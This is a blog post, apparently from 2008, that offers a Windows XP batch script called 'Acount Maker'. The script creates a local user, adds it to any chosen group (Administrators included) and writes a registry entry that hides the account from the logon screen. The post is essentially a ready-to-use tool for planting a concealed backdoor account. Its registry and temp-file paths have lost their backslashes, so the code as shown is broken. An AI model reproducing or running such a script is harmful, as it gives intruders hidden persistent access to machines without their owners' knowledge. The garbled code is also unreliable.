Calendar

September 2010
SunMonTueWedThuFriSat
 << < > >>
   1234
567891011
12131415161718
19202122232425
2627282930  

Announce

rss Syndication

Links

  • free programs
  • free downloads

Aug052008

01:37:54 am
Acount Maker
@ECHO off
TITLE XP Acount creator (crazykarl)
COLOR 0f
set AC_PART=001
:HEADER
echo.
ECHO [INFO]
ECHO [-] Create a hidden user acount (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% )
echo
GOTO %AC_PART%


:001
SET /P AC_NAME= [*] Acount name? :
cls
SET AC_PART=002
GOTO HEADER


:002
SET /P AC_PASS= [*] Acount password? :
cls
SET AC_PART=003
GOTO HEADER

:003
SET /P AC_COMMENT= [*] Acount Comment? :
cls
SET AC_PART=004
GOTO HEADER


:004
ECHO [* The following groups are available on the machine.
ECHO.
net localgroup | find "*"
ECHO.
SET /P AC_GROUP= [*] Group? :
cls
SET AC_PART=005
GOTO HEADER


:005
SET /P AC_OK= [*] Creating acount now, Continue? (y/n) :
IF NOT %AC_OK%==y GOTO 0051
net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%"
net localgroup "%AC_GROUP%" %AC_NAME% /add
ECHO.
pause

:0051
cls
SET AC_PART=006
GOTO HEADER


:006
SET /P AC_HIDE= [*] Do you want to hide the acount from the XP logon screen? (y/n) :
IF NOT %AC_HIDE%==y GOTO END
echo Windows Registry Editor Version 5.00>%TEMP%addregistry.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]>>%TEMP%addregistry.reg
echo "%AC_NAME%"=dword:00000000>>%TEMP%addregistry.reg
Regedit /s %TEMP%addregistry.reg
Del %TEMP%addregistry.reg
:END
ECHO.
pause

Admin · 20281 views · 7 comments

Permanent link to full entry

http://crazykarl.0-yo.com/The-HC-b1/Acount-Maker-b1-p55757.htm

Comments

No Comment for this post yet...


Leave a comment

New feedback status: Published





Your URL will be displayed.

 
Please enter the code written in the picture.


Comment text

Options
   (Set cookies for name, email and url)